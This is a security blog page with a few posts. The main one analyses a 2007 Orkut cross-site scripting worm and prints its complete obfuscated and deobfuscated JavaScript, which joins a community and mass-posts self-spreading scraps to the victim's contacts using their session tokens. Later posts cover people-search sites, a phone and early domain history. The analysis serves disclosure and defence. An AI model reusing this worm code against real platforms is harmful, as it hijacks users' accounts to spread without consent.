Orkut/Google worms Compromise over 400,000 accounts

Also posted to the Trend Micro blog (without the code samples at the end)

There appears to be a web worm which has replicated at an alarming rate through Google’s Orkut social network in the last few hours.Infection starts when the user is sent an email telling them that they have a new Scrapbook entry (essentially a guestbook). Upon visiting their page the user sees the text:

“2008 vem ai… que ele comece mto bem para vc”

No interaction is necessary, simply looking at the scrap starts the infection sequence. The scrap deletes itself, and the user is added to the Orkut Community “Infectados pelo Vírus do Orkut”. It then downloads and executes a heavily obfuscated Javascript from http://files.myopera.com/virusdoorkut/files/virus.js, which in turns sends a copy of the original Scrapbook post to all of the users Orkut Contact’s, so that they too will be infected by the threat.At last count the group had over 400,000 users who had been infected. A google translation of the description of the groups reads:

“CALMA!
If you came into this community, make sure that no data was stolen and not your will, that is not my goal.
If I are sure at the end of all, this community should is lotada of people.
This just to show how orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.”

It appears from both the script which we have analysed, and this description that this script was designed purely to spread, rather than for more malicious purposes normally associated with this type of attack. The author has since pulled the malicious Javascript from the web, having apparently gotten his point across. The attack works due to Orkut allowing users to embed Flash content in their scrap posts (although it does filter for normal XSS techniques).

The author appears to have created a SWFObject that calls the malicious javascript and was able to use this to bypass Orkuts filters.This is not the first time a worm like this has targetted a social network. MySpace fell victim to the infamous "Samy Is My Hero” XSS Worm released in 2005. Luckily for the almost half a million users this was purely a proof of concept. The possible implications of a more malicious attack in the future however are much more worrying.

APPENDIX (Code Details):

ORIGINAL OBFUSCATED CODE:

function $(p,a,c,k,e,d) {
e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
  while(c--){d[e(c)]=k[c]||e(c)}
  k=[function(e){return d[e]}];
  e=function(){return'\\w+'};
  c=1
};
while(c--){
  if(k[c]){
      p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  }
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o=" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"

DEOBFUSCATE CODE

var index=0;
var POST=JSHDF["CGI.POST_TOKEN"];
var SIG=JSHDF["Page.signature.raw"];

function createXMLHttpRequest(){
try {
   return new
   ActiveXObject("Msxml2.XMLHTTP")
}
catch(e){
} ;

try {
   return new ActiveXObject("Microsoft.XMLHTTP")
}
catch(e){
};

try {
   return new XMLHttpRequest()
}
catch(e){
} ;
return null
};

function setCookie(name,value,expires,path,domain,secure){
var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");
document.cookie=curCookie
};

function getCookie(name){
var dc=document.cookie;
var prefix=name+"=";
var begin=dc.indexOf(";"+prefix);
if(begin==-1){
   begin=dc.indexOf(prefix);
   if(begin!=0){
       return false
   }
} else {
   begin+=2
};
var end=document.cookie.indexOf(";",begin);

if(end==-1){
   end=dc.length
};
return unescape(dc.substring(begin+prefix.length,end))
};

function deleteCookie(name,path,domain){
if(getCookie(name)){ document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";
   history.go(0)
   }
};

function loadFriends(){
var xml=createXMLHttpRequest();
if(xml){
   xml.open("GET","http://www.orkut.com/Compose.aspx",true);
   xml.send(null);
   xml.onreadystatechange=function(){
       if(xml.readyState==4){
           if(xml.status==200){
               var xmlr=xml.responseText;
               var div=document.createElement("div");
               div.innerHTML=xmlr;
               var select=div.getElementsByTagName("select").item(0);
               if(select){
                   select.removeChild(select.getElementsByTagName("option").item(0));
                   select.setAttribute("id","selectedList");
                   select.style.display="none";
                   document.body.appendChild(select);
                   sendScrap()
               }
           } else {
               loadFriends()
           }
       }
   };
   xml.send(null)
}
};


function cmm_join(){
var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
var  xml=createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);
xml.onreadystatechange=function(){
   if(xml.readyState==4){
       if(xml.status!=200){
           cmm_join();
           return
       };
       loadFriends()
   }
}
};

function sendScrap(){
if(index==document.getElementById("selectedList").length){
   return
};
var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";
var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;

var xml=createXMLHttpRequest();
xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);
xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange=function(){
   if(xml.readyState==4){
       index++;
       var wDate=new Date;
       wDate.setTime(wDate.getTime()+86400);
       setCookie('wormdoorkut',index,wDate);
       sendScrap()
   }
}
};

if(!getCookie('wormdoorkut')){
var wDate=new Date;
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut','0',wDate)
};

index=getCookie('wormdoorkut');
cmm_join();

Identity Theft made easy

Now up on Trend Micro with a few alterations

In todays world of Social Netorking sites, finding enough information to impersonate someone is trivial at best. The only difficult part of the process is tracking down an individual from say their email address, to their profile on a MySpace or Bebo page. With the new OpenSocial initiative, this has become a lot easier to do.

Sites such as Spokeo, Spock and a whole host of others will gladly trawl all available OpenSocial social networks if supplied with an email address of a "friend". The full list of services implemented depends on the site, but a full list of the services provided by Spokeo is available here . This stuff is a dream come true for identity thiefs.

Lets take an example. I decided to use my own email address and see what I could find out about myself. Now it should be noted that I do not take part in a lot of online Social Networking, so this should yield higher results in most cases. Also I deliberately set my status to public on the networks that I do frequent for the purposes of the experiment as these services (luckily) will not trawl private pages.

The search showed up my Bebo account, Picassa account, this blog, my Amazon WishList and all entried I have made to Digg.com. Note that OpenSocial does not include Facebook, so that did not show up. I have been careful to keep personal data off the web, but had completely forgotten about the Picasa and Amazon pages.

For added effect I decided to pick one of my friends at random, and just using their email address, find out as much about them as possible. Obviously I won't call out the exact details, but heres a taster:

Name, Address, Date Of Birth, Photos, Family Members, Location of Work + Full Education/Work History, Phone Number, Like Dislikes, Pets, and a whole pile more.

Considering that most banks ask for less information than that when changing details, and you begin to get an idea of how big an issue this is.

Mobiles as Modems

I was reading the following story over on the Beeb (http://news.bbc.co.uk/2/hi/americas/7141935.stm) and while I initially sympathised with the guy thinking that it was some sort of a crazy decimal point error on behalf of the Mobile Phone network provider, it turns out he is just an idiot who ran up over 80K using his Mobile as a modem.

I recently have come into the possesion of the very spiffy Nokia N95-2 8GB and I have been thoroughly impressed so far. Add to this that my service provider has introduced a new 99c for 50Mb daily flat rates, and internet over Mobile is fast becoming a reality for me.
Add to this the fact that the N95 doubles as the following, and you can start to tell why I am so impressed with it:

- 8Gb MP3 Player
- Portable Movie Player
- Internet browser (WiFi + 3G)
- 5Mb Camera/Camcorder
- N-Gage handheld games machine
- Personal Organiser

Oh and they threw a phone in for good measure. I intend doing a proper review in about a month, after I have had time to really use it a lot, but for now its one hell of a Christmas pressie :)

History of .com

Today I came across some work carried by http://thelongestlistofthelongeststuffatthelongestdomainnameatlonglast.com which details the first 100 .com sites registered, the first being www.symbolics.com registered back in March 15th 1985. Needless to say this list was already added to the Wikipedia article. Some of the 100 I have never heard of, while others such are household names ( Xerox, HP, IBM, etc).

It is interesting to note that there are no Security Vendors or Porn sites on the list. I guess the web was a nicer place back in 1987 (the infamous Morris Worm did not hit until 1988) . Also Microsoft don't make the cut either, having only gotten on the bandwagon on the 2nd May 1991 almost 3 years before Playboy.com realised the potential of the new communication medium.

If you are interested to see when other domains where registered, pop over to network-tools.com and run a Whois search. An easy way to kill a few minutes at work :)